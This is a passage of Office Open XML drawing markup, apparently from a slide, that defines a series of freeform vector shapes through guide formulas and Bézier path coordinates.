                <a:gd name="T27" fmla="*/ 367 h 388"/>
                <a:gd name="T28" fmla="*/ 117 w 203"/>
                <a:gd name="T29" fmla="*/ 348 h 388"/>
                <a:gd name="T30" fmla="*/ 203 w 203"/>
                <a:gd name="T31" fmla="*/ 261 h 388"/>
                <a:gd name="T32" fmla="*/ 117 w 203"/>
                <a:gd name="T33" fmla="*/ 174 h 388"/>
                <a:gd name="T34" fmla="*/ 117 w 203"/>
                <a:gd name="T35" fmla="*/ 70 h 388"/>
                <a:gd name="T36" fmla="*/ 166 w 203"/>
                <a:gd name="T37" fmla="*/ 104 h 388"/>
                <a:gd name="T38" fmla="*/ 159 w 203"/>
                <a:gd name="T39" fmla="*/ 121 h 388"/>
                <a:gd name="T40" fmla="*/ 181 w 203"/>
                <a:gd name="T41" fmla="*/ 143 h 388"/>
                <a:gd name="T42" fmla="*/ 203 w 203"/>
                <a:gd name="T43" fmla="*/ 118 h 388"/>
                <a:gd name="T44" fmla="*/ 117 w 203"/>
                <a:gd name="T45" fmla="*/ 39 h 388"/>
                <a:gd name="T46" fmla="*/ 117 w 203"/>
                <a:gd name="T47" fmla="*/ 21 h 388"/>
                <a:gd name="T48" fmla="*/ 102 w 203"/>
                <a:gd name="T49" fmla="*/ 0 h 388"/>
                <a:gd name="T50" fmla="*/ 87 w 203"/>
                <a:gd name="T51" fmla="*/ 21 h 388"/>
                <a:gd name="T52" fmla="*/ 87 w 203"/>
                <a:gd name="T53" fmla="*/ 40 h 388"/>
                <a:gd name="T54" fmla="*/ 0 w 203"/>
                <a:gd name="T55" fmla="*/ 121 h 388"/>
                <a:gd name="T56" fmla="*/ 87 w 203"/>
                <a:gd name="T57" fmla="*/ 202 h 388"/>
                <a:gd name="T58" fmla="*/ 87 w 203"/>
                <a:gd name="T59" fmla="*/ 167 h 388"/>
                <a:gd name="T60" fmla="*/ 32 w 203"/>
                <a:gd name="T61" fmla="*/ 119 h 388"/>
                <a:gd name="T62" fmla="*/ 87 w 203"/>
                <a:gd name="T63" fmla="*/ 70 h 388"/>
                <a:gd name="T64" fmla="*/ 87 w 203"/>
                <a:gd name="T65" fmla="*/ 16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117" y="209"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="215"/>
                    <a:pt x="171" y="238"/>
                    <a:pt x="171" y="263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="288"/>
                    <a:pt x="149" y="312"/>
                    <a:pt x="117" y="317"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="117" y="209"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="87" y="202"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="87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7" y="0"/>
                    <a:pt x="87" y="13"/>
                    <a:pt x="87" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="87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8" name="Freeform 219">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD631DA4-81EA-484A-8178-00E0B0A0F8F6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200275" y="2114550"/>
              <a:ext cx="69850" cy="90488"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 203"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 203 w 203"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 203"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 203"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 114 w 203"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 203 w 203"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 186 w 203"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 203"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 203"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 35 w 203"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 203"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 35 w 203"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 203"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 168 w 203"/>
                <a:gd name="T27" fmla="*/ 94 h 222"/>
                <a:gd name="T28" fmla="*/ 35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184" y="124"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="124"/>
                    <a:pt x="203" y="124"/>
                    <a:pt x="203" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203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9" name="Freeform 220">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F913A378-40E9-42B7-ADC1-55967E3C9558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293937" y="2114550"/>
              <a:ext cx="66675" cy="90488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2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0" name="Freeform 221">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27F652BE-D2A3-472B-87F1-81AC7E2C5CE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373312" y="2079625"/>
              <a:ext cx="85725" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 207 w 249"/>
                <a:gd name="T1" fmla="*/ 158 h 304"/>
                <a:gd name="T2" fmla="*/ 142 w 249"/>
                <a:gd name="T3" fmla="*/ 86 h 304"/>
                <a:gd name="T4" fmla="*/ 77 w 249"/>
                <a:gd name="T5" fmla="*/ 113 h 304"/>
                <a:gd name="T6" fmla="*/ 77 w 249"/>
                <a:gd name="T7" fmla="*/ 20 h 304"/>
                <a:gd name="T8" fmla="*/ 57 w 249"/>
                <a:gd name="T9" fmla="*/ 0 h 304"/>
                <a:gd name="T10" fmla="*/ 21 w 249"/>
                <a:gd name="T11" fmla="*/ 0 h 304"/>
                <a:gd name="T12" fmla="*/ 0 w 249"/>
                <a:gd name="T13" fmla="*/ 15 h 304"/>
                <a:gd name="T14" fmla="*/ 20 w 249"/>
                <a:gd name="T15" fmla="*/ 30 h 304"/>
                <a:gd name="T16" fmla="*/ 43 w 249"/>
                <a:gd name="T17" fmla="*/ 30 h 304"/>
                <a:gd name="T18" fmla="*/ 43 w 249"/>
                <a:gd name="T19" fmla="*/ 274 h 304"/>
                <a:gd name="T20" fmla="*/ 21 w 249"/>
                <a:gd name="T21" fmla="*/ 274 h 304"/>
                <a:gd name="T22" fmla="*/ 0 w 249"/>
                <a:gd name="T23" fmla="*/ 289 h 304"/>
                <a:gd name="T24" fmla="*/ 20 w 249"/>
                <a:gd name="T25" fmla="*/ 304 h 304"/>
                <a:gd name="T26" fmla="*/ 99 w 249"/>
                <a:gd name="T27" fmla="*/ 304 h 304"/>
                <a:gd name="T28" fmla="*/ 119 w 249"/>
                <a:gd name="T29" fmla="*/ 289 h 304"/>
                <a:gd name="T30" fmla="*/ 99 w 249"/>
                <a:gd name="T31" fmla="*/ 274 h 304"/>
                <a:gd name="T32" fmla="*/ 77 w 249"/>
                <a:gd name="T33" fmla="*/ 274 h 304"/>
                <a:gd name="T34" fmla="*/ 77 w 249"/>
                <a:gd name="T35" fmla="*/ 186 h 304"/>
                <a:gd name="T36" fmla="*/ 139 w 249"/>
                <a:gd name="T37" fmla="*/ 117 h 304"/>
                <a:gd name="T38" fmla="*/ 173 w 249"/>
                <a:gd name="T39" fmla="*/ 161 h 304"/>
                <a:gd name="T40" fmla="*/ 173 w 249"/>
                <a:gd name="T41" fmla="*/ 274 h 304"/>
                <a:gd name="T42" fmla="*/ 153 w 249"/>
                <a:gd name="T43" fmla="*/ 274 h 304"/>
                <a:gd name="T44" fmla="*/ 133 w 249"/>
                <a:gd name="T45" fmla="*/ 289 h 304"/>
                <a:gd name="T46" fmla="*/ 153 w 249"/>
                <a:gd name="T47" fmla="*/ 304 h 304"/>
                <a:gd name="T48" fmla="*/ 230 w 249"/>
                <a:gd name="T49" fmla="*/ 304 h 304"/>
                <a:gd name="T50" fmla="*/ 249 w 249"/>
                <a:gd name="T51" fmla="*/ 289 h 304"/>
                <a:gd name="T52" fmla="*/ 229 w 249"/>
                <a:gd name="T53" fmla="*/ 274 h 304"/>
                <a:gd name="T54" fmla="*/ 207 w 249"/>
                <a:gd name="T55" fmla="*/ 274 h 304"/>
                <a:gd name="T56" fmla="*/ 207 w 249"/>
                <a:gd name="T57" fmla="*/ 15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4">
                  <a:moveTo>
                    <a:pt x="207" y="158"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="108"/>
                    <a:pt x="182" y="86"/>
                    <a:pt x="142" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="86"/>
                    <a:pt x="86" y="103"/>
                    <a:pt x="77" y="113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89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="304"/>
                    <a:pt x="119" y="304"/>
                    <a:pt x="119" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="274"/>
                    <a:pt x="107" y="274"/>
                    <a:pt x="99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4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="274"/>
                    <a:pt x="133" y="274"/>
                    <a:pt x="133" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="304"/>
                    <a:pt x="146" y="304"/>
                    <a:pt x="153" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="230" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="304"/>
                    <a:pt x="249" y="304"/>
                    <a:pt x="249" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249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1" name="Freeform 222">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{864CAA51-6841-46B7-A621-B0A0A2C329CA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471737" y="2114550"/>
              <a:ext cx="69850" cy="90488"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 205 w 205"/>
                <a:gd name="T1" fmla="*/ 112 h 222"/>
                <a:gd name="T2" fmla="*/ 102 w 205"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 205"/>
                <a:gd name="T5" fmla="*/ 112 h 222"/>
                <a:gd name="T6" fmla="*/ 102 w 205"/>
                <a:gd name="T7" fmla="*/ 222 h 222"/>
                <a:gd name="T8" fmla="*/ 205 w 205"/>
                <a:gd name="T9" fmla="*/ 112 h 222"/>
                <a:gd name="T10" fmla="*/ 102 w 205"/>
                <a:gd name="T11" fmla="*/ 192 h 222"/>
                <a:gd name="T12" fmla="*/ 34 w 205"/>
                <a:gd name="T13" fmla="*/ 108 h 222"/>
                <a:gd name="T14" fmla="*/ 102 w 205"/>
                <a:gd name="T15" fmla="*/ 30 h 222"/>
                <a:gd name="T16" fmla="*/ 170 w 205"/>
                <a:gd name="T17" fmla="*/ 108 h 222"/>
                <a:gd name="T18" fmla="*/ 102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2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5" y="174"/>
                    <a:pt x="205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2" name="Freeform 223">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C2CBB7C-C773-4914-B48A-A10A24A1B8BB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652712" y="2062163"/>
              <a:ext cx="69850" cy="158750"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 117 w 203"/>
                <a:gd name="T1" fmla="*/ 209 h 388"/>
                <a:gd name="T2" fmla="*/ 171 w 203"/>
                <a:gd name="T3" fmla="*/ 263 h 388"/>
                <a:gd name="T4" fmla="*/ 117 w 203"/>
                <a:gd name="T5" fmla="*/ 317 h 388"/>
                <a:gd name="T6" fmla="*/ 117 w 203"/>
                <a:gd name="T7" fmla="*/ 209 h 388"/>
                <a:gd name="T8" fmla="*/ 86 w 203"/>
                <a:gd name="T9" fmla="*/ 202 h 388"/>
                <a:gd name="T10" fmla="*/ 86 w 203"/>
                <a:gd name="T11" fmla="*/ 318 h 388"/>
                <a:gd name="T12" fmla="*/ 36 w 203"/>
                <a:gd name="T13" fmla="*/ 278 h 388"/>
                <a:gd name="T14" fmla="*/ 44 w 203"/>
                <a:gd name="T15" fmla="*/ 261 h 388"/>
                <a:gd name="T16" fmla="*/ 22 w 203"/>
                <a:gd name="T17" fmla="*/ 239 h 388"/>
                <a:gd name="T18" fmla="*/ 0 w 203"/>
                <a:gd name="T19" fmla="*/ 263 h 388"/>
                <a:gd name="T20" fmla="*/ 86 w 203"/>
                <a:gd name="T21" fmla="*/ 349 h 388"/>
                <a:gd name="T22" fmla="*/ 86 w 203"/>
                <a:gd name="T23" fmla="*/ 367 h 388"/>
                <a:gd name="T24" fmla="*/ 102 w 203"/>
                <a:gd name="T25" fmla="*/ 388 h 388"/>
                <a:gd name="T26" fmla="*/ 117 w 203"/>
                <a:gd name="T27" fmla="*/ 367 h 388"/>
                <a:gd name="T28" fmla="*/ 117 w 203"/>
                <a:gd name="T29" fmla="*/ 348 h 388"/>
                <a:gd name="T30" fmla="*/ 203 w 203"/>
                <a:gd name="T31" fmla="*/ 261 h 388"/>
                <a:gd name="T32" fmla="*/ 117 w 203"/>
                <a:gd name="T33" fmla="*/ 174 h 388"/>
                <a:gd name="T34" fmla="*/ 117 w 203"/>
                <a:gd name="T35" fmla="*/ 70 h 388"/>
                <a:gd name="T36" fmla="*/ 166 w 203"/>
                <a:gd name="T37" fmla="*/ 104 h 388"/>
                <a:gd name="T38" fmla="*/ 159 w 203"/>
                <a:gd name="T39" fmla="*/ 121 h 388"/>
                <a:gd name="T40" fmla="*/ 181 w 203"/>
                <a:gd name="T41" fmla="*/ 143 h 388"/>
                <a:gd name="T42" fmla="*/ 203 w 203"/>
                <a:gd name="T43" fmla="*/ 118 h 388"/>
                <a:gd name="T44" fmla="*/ 117 w 203"/>
                <a:gd name="T45" fmla="*/ 39 h 388"/>
                <a:gd name="T46" fmla="*/ 117 w 203"/>
                <a:gd name="T47" fmla="*/ 21 h 388"/>
                <a:gd name="T48" fmla="*/ 102 w 203"/>
                <a:gd name="T49" fmla="*/ 0 h 388"/>
                <a:gd name="T50" fmla="*/ 86 w 203"/>
                <a:gd name="T51" fmla="*/ 21 h 388"/>
                <a:gd name="T52" fmla="*/ 86 w 203"/>
                <a:gd name="T53" fmla="*/ 40 h 388"/>
                <a:gd name="T54" fmla="*/ 0 w 203"/>
                <a:gd name="T55" fmla="*/ 121 h 388"/>
                <a:gd name="T56" fmla="*/ 86 w 203"/>
                <a:gd name="T57" fmla="*/ 202 h 388"/>
                <a:gd name="T58" fmla="*/ 86 w 203"/>
                <a:gd name="T59" fmla="*/ 167 h 388"/>
                <a:gd name="T60" fmla="*/ 32 w 203"/>
                <a:gd name="T61" fmla="*/ 119 h 388"/>
                <a:gd name="T62" fmla="*/ 86 w 203"/>
                <a:gd name="T63" fmla="*/ 70 h 388"/>
                <a:gd name="T64" fmla="*/ 86 w 203"/>
                <a:gd name="T65" fmla="*/ 16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117" y="209"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="215"/>
                    <a:pt x="171" y="238"/>
                    <a:pt x="171" y="263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="288"/>
                    <a:pt x="149" y="312"/>
                    <a:pt x="117" y="317"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="117" y="209"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="86" y="202"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="86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3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="29" y="343"/>
                    <a:pt x="86" y="349"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="86" y="367"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="375"/>
                    <a:pt x="86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6" y="0"/>
                    <a:pt x="86" y="13"/>
                    <a:pt x="86" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="86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6" y="202"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="86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5" y="75"/>
                    <a:pt x="86" y="70"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="86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3" name="Freeform 224">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19415F7A-75EB-475F-BCF9-BB67A0D672F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762250" y="2062163"/>
              <a:ext cx="44450" cy="157163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 132 w 132"/>
                <a:gd name="T1" fmla="*/ 373 h 387"/>
                <a:gd name="T2" fmla="*/ 120 w 132"/>
                <a:gd name="T3" fmla="*/ 358 h 387"/>
                <a:gd name="T4" fmla="*/ 35 w 132"/>
                <a:gd name="T5" fmla="*/ 194 h 387"/>
                <a:gd name="T6" fmla="*/ 121 w 132"/>
                <a:gd name="T7" fmla="*/ 29 h 387"/>
                <a:gd name="T8" fmla="*/ 132 w 132"/>
                <a:gd name="T9" fmla="*/ 14 h 387"/>
                <a:gd name="T10" fmla="*/ 117 w 132"/>
                <a:gd name="T11" fmla="*/ 0 h 387"/>
                <a:gd name="T12" fmla="*/ 0 w 132"/>
                <a:gd name="T13" fmla="*/ 194 h 387"/>
                <a:gd name="T14" fmla="*/ 41 w 132"/>
                <a:gd name="T15" fmla="*/ 323 h 387"/>
                <a:gd name="T16" fmla="*/ 117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6"/>
                    <a:pt x="129" y="364"/>
                    <a:pt x="120" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="316"/>
                    <a:pt x="35" y="250"/>
                    <a:pt x="35" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="144"/>
                    <a:pt x="54" y="75"/>
                    <a:pt x="121" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="24"/>
                    <a:pt x="132" y="22"/>
                    <a:pt x="132" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="10"/>
                    <a:pt x="130" y="0"/>
                    <a:pt x="117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1" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="359"/>
                    <a:pt x="105" y="387"/>
                    <a:pt x="117" y="387"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130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4" name="Freeform 225">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27964257-B699-43A4-9E4C-A7A1D444C4BB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824162" y="2114550"/>
              <a:ext cx="82550" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 237"/>
                <a:gd name="T1" fmla="*/ 87 h 329"/>
                <a:gd name="T2" fmla="*/ 137 w 237"/>
                <a:gd name="T3" fmla="*/ 31 h 329"/>
                <a:gd name="T4" fmla="*/ 203 w 237"/>
                <a:gd name="T5" fmla="*/ 111 h 329"/>
                <a:gd name="T6" fmla="*/ 133 w 237"/>
                <a:gd name="T7" fmla="*/ 191 h 329"/>
                <a:gd name="T8" fmla="*/ 77 w 237"/>
                <a:gd name="T9" fmla="*/ 123 h 329"/>
                <a:gd name="T10" fmla="*/ 77 w 237"/>
                <a:gd name="T11" fmla="*/ 87 h 329"/>
                <a:gd name="T12" fmla="*/ 77 w 237"/>
                <a:gd name="T13" fmla="*/ 196 h 329"/>
                <a:gd name="T14" fmla="*/ 134 w 237"/>
                <a:gd name="T15" fmla="*/ 221 h 329"/>
                <a:gd name="T16" fmla="*/ 237 w 237"/>
                <a:gd name="T17" fmla="*/ 111 h 329"/>
                <a:gd name="T18" fmla="*/ 140 w 237"/>
                <a:gd name="T19" fmla="*/ 0 h 329"/>
                <a:gd name="T20" fmla="*/ 77 w 237"/>
                <a:gd name="T21" fmla="*/ 25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9 h 329"/>
                <a:gd name="T34" fmla="*/ 20 w 237"/>
                <a:gd name="T35" fmla="*/ 299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9 h 329"/>
                <a:gd name="T46" fmla="*/ 77 w 237"/>
                <a:gd name="T47" fmla="*/ 299 h 329"/>
                <a:gd name="T48" fmla="*/ 77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7"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="57"/>
                    <a:pt x="105" y="31"/>
                    <a:pt x="137" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="31"/>
                    <a:pt x="203" y="67"/>
                    <a:pt x="203" y="111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7"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="77" y="196"/>
                  </a:move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1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7" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="10"/>
                    <a:pt x="75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0" y="299"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12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6" y="299"/>
                    <a:pt x="98" y="299"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="299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5" name="Freeform 226">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D76BB464-7AB7-4FD9-82FF-5357060FE022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917825" y="2114550"/>
              <a:ext cx="77788" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 95 w 227"/>
                <a:gd name="T1" fmla="*/ 126 h 218"/>
                <a:gd name="T2" fmla="*/ 185 w 227"/>
                <a:gd name="T3" fmla="*/ 31 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 53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1 h 218"/>
                <a:gd name="T12" fmla="*/ 95 w 227"/>
                <a:gd name="T13" fmla="*/ 24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4 h 218"/>
                <a:gd name="T22" fmla="*/ 61 w 227"/>
                <a:gd name="T23" fmla="*/ 34 h 218"/>
                <a:gd name="T24" fmla="*/ 61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6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="79"/>
                    <a:pt x="124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1" y="34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6" name="Freeform 227">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{972BF592-44DE-4241-83BC-3291760F1DAA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016250" y="2078038"/>
              <a:ext cx="65088" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 111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1 h 305"/>
                <a:gd name="T10" fmla="*/ 80 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 305"/>
                <a:gd name="T12" fmla="*/ 80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1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7" name="Freeform 228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9A54EE3-810B-4AFA-9A27-C7F240A8756E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094037" y="2114550"/>
              <a:ext cx="87313" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 250"/>
                <a:gd name="T1" fmla="*/ 27 h 218"/>
                <a:gd name="T2" fmla="*/ 57 w 250"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21 w 250"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 250"/>
                <a:gd name="T7" fmla="*/ 19 h 218"/>
                <a:gd name="T8" fmla="*/ 20 w 250"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 43 w 250"/>
                <a:gd name="T11" fmla="*/ 34 h 218"/>
                <a:gd name="T12" fmla="*/ 43 w 250"/>
                <a:gd name="T13" fmla="*/ 188 h 218"/>
                <a:gd name="T14" fmla="*/ 21 w 250"/>
                <a:gd name="T15" fmla="*/ 188 h 218"/>
                <a:gd name="T16" fmla="*/ 0 w 250"/>
                <a:gd name="T17" fmla="*/ 203 h 218"/>
                <a:gd name="T18" fmla="*/ 20 w 250"/>
                <a:gd name="T19" fmla="*/ 218 h 218"/>
                <a:gd name="T20" fmla="*/ 99 w 250"/>
                <a:gd name="T21" fmla="*/ 218 h 218"/>
                <a:gd name="T22" fmla="*/ 119 w 250"/>
                <a:gd name="T23" fmla="*/ 203 h 218"/>
                <a:gd name="T24" fmla="*/ 99 w 250"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 250"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 250"/>
                <a:gd name="T29" fmla="*/ 100 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 250"/>
                <a:gd name="T31" fmla="*/ 31 h 218"/>
                <a:gd name="T32" fmla="*/ 173 w 250"/>
                <a:gd name="T33" fmla="*/ 75 h 218"/>
                <a:gd name="T34" fmla="*/ 173 w 250"/>
                <a:gd name="T35" fmla="*/ 188 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 250"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 133 w 250"/>
                <a:gd name="T39" fmla="*/ 203 h 218"/>
                <a:gd name="T40" fmla="*/ 153 w 250"/>
                <a:gd name="T41" fmla="*/ 218 h 218"/>
                <a:gd name="T42" fmla="*/ 230 w 250"/>
                <a:gd name="T43" fmla="*/ 218 h 218"/>
                <a:gd name="T44" fmla="*/ 250 w 250"/>
                <a:gd name="T45" fmla="*/ 203 h 218"/>
                <a:gd name="T46" fmla="*/ 229 w 250"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 207 w 250"/>
                <a:gd name="T49" fmla="*/ 188 h 218"/>
                <a:gd name="T50" fmla="*/ 207 w 250"/>
                <a:gd name="T51" fmla="*/ 72 h 218"/>
                <a:gd name="T52" fmla="*/ 142 w 250"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 77 w 250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7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8" name="Freeform 229">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA659554-5F1C-4A48-B069-E10573A92F26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187700" y="2090738"/>
              <a:ext cx="73025" cy="114300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 212"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 212"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 212"/>
                <a:gd name="T5" fmla="*/ 77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7 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 212"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 212"/>
                <a:gd name="T25" fmla="*/ 92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2" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="11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9" name="Freeform 230">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E6BC21F-55BC-43F6-852E-0735791B0934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279775" y="2078038"/>
              <a:ext cx="68263" cy="125413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4 w 197"/>
                <a:gd name="T13" fmla="*/ 30 h 307"/>
                <a:gd name="T14" fmla="*/ 176 w 197"/>
                <a:gd name="T15" fmla="*/ 51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1 w 197"/>
                <a:gd name="T27" fmla="*/ 108 h 307"/>
                <a:gd name="T28" fmla="*/ 21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1 w 197"/>
